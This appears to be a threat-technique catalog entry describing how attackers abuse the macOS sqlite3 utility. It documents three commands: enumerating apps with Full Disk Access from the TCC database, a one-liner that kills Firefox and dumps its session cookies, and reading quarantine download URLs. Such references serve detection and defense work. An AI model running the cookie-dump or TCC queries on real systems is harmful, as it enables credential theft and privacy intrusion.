Created by Brendan Chamberlain (@infosecB)


sqlite is a command-line utility that allows users to query and manage sqlite databases. Many components of macOS and apps used sqlite to store data. Attackers can leverage this tool to discover sensitive data.

2023-05-23Discovery Collection Credential Accesspermissions oneliner cookie-theft


  • /usr/bin/sqlite3

Use Cases

Get apps with Full Disk access

The following command interacts with the TCC (Transparency, Consent, and Control) database to show the apps that have Full Disk access permission

sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db \
'select client from access where auth_value and service = "kTCCServiceSystemPolicyAllFiles"'

The following one-liner can be used to kill Firefox and dump cookie data from the user’s Firefox profile.

killall firefox; find ~/Library/Application\ Support/Firefox/Profiles/. | grep cookies.sqlite | xargs -I {} sqlite3 {} "select * from moz_cookies"

View URL associated with file downloads

The following sqlite command is commonly used by macOS malware to view the URL in which the payload was downloaded from.

sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV* 'select LSQuarantineDataURLString from LSQuarantineEvent'